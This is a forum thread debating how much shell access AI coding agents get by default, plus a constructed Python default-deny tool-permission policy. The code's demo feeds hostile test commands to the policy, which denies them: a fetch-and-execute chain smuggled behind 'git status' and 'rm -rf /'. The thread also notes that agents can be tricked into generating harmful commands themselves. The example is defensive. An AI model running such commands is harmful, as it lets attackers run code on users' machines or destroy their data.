mystifyingpoi a day ago

Determinism is one thing, but the more pressing thing is permission boundaries. All these AI agent tools need to come with no permissions at all out of the box, and everything should be granularly granted. But that would break all the cool demos and marketing pitches.

Allowing an agent to run wild with any arbitrary shell commands is just plain stupid. This should never happen to begin with.
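Added example (mine, not code from any commenter or from any real agent product) of the default-deny, granular-grant model this comment argues for; the tool names, argument keys and the `ToolPolicy`/`Grant` classes are all constructed. It is an in-process check only, so it is exactly the "process constraining itself" that later replies say must still be backed by an OS-level boundary.

```python
"""Default-deny tool-permission policy for an AI coding agent (constructed example)."""
import shlex
from dataclasses import dataclass, field

# Characters that turn one argv into a pipeline or command chain; without this
# check a grant for "git status" silently covers "git status; <anything>".
SHELL_METACHARS = set("|&;<>$`\\()\n")


@dataclass(frozen=True)
class Grant:
    """One narrowly scoped permission: a tool, plus the argv prefixes it may run."""
    tool: str
    argv_prefixes: tuple = ()   # only meaningful for tool == "shell"


@dataclass
class ToolPolicy:
    """Out of the box the grant list is empty, so every call is denied."""
    grants: list = field(default_factory=list)

    def grant(self, tool: str, *argv_prefixes: tuple) -> None:
        self.grants.append(Grant(tool, argv_prefixes))

    def authorize(self, tool: str, args: dict) -> tuple[bool, str]:
        for g in self.grants:
            if g.tool != tool:
                continue
            if tool != "shell":
                return True, f"allow: explicit grant for {tool!r}"
            command = args.get("command", "")
            if any(c in SHELL_METACHARS for c in command):
                return False, "deny: shell metacharacters in command"
            argv = tuple(shlex.split(command))          # later run with shell=False
            for prefix in g.argv_prefixes:
                if argv[: len(prefix)] == tuple(prefix):
                    return True, f"allow: matches grant {' '.join(prefix)!r}"
        return False, f"deny: no grant covers {tool!r} call {args!r}"


def demo() -> list[tuple[bool, str]]:
    """Walk through the policy from empty to a few granular grants."""
    policy = ToolPolicy()                                                   # nothing granted yet
    results = [policy.authorize("shell", {"command": "git status"})]        # denied
    policy.grant("read_file")
    policy.grant("shell", ("git", "status"), ("git", "diff"))
    results += [
        policy.authorize("read_file", {"path": "src/app.py"}),              # allowed
        policy.authorize("shell", {"command": "git diff --stat"}),          # allowed
        policy.authorize("shell", {"command": "git status; curl x | sh"}),  # denied
        policy.authorize("shell", {"command": "rm -rf /"}),                 # denied
        policy.authorize("write_file", {"path": "src/app.py"}),             # denied
    ]
    return results
```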

zzzeek a day ago | parent | next [-]

> All these AI agent tools need to come with no permissions at all out of the box, and everything should be granularly granted.

That's what the tools already do. If you were watching some cool demo that didn't have all the prompts, they may have been running the tools in "yolo mode", which is not usually a normal thing.

TZubiri a day ago | parent | prev [-]

That's what they are actually doing.

I think quite the opposite: agents need to come with all permissions possible, highlighting that it's actually the OS's responsibility to constrain them.

It's kind of dumb to expect a process to constrain itself.

VTimofeenko a day ago | parent [-]

A non-deterministic process at that. Coding agents are basically the "curl into sh" pattern on steroids.

Terr_ a day ago | parent [-]

Even worse, the sh portion is recursive.

So the attacker doesn't need to send an evil-bit over the network, if they can trigger the system into dreaming up the evil-bit indirectly as its own output at some point.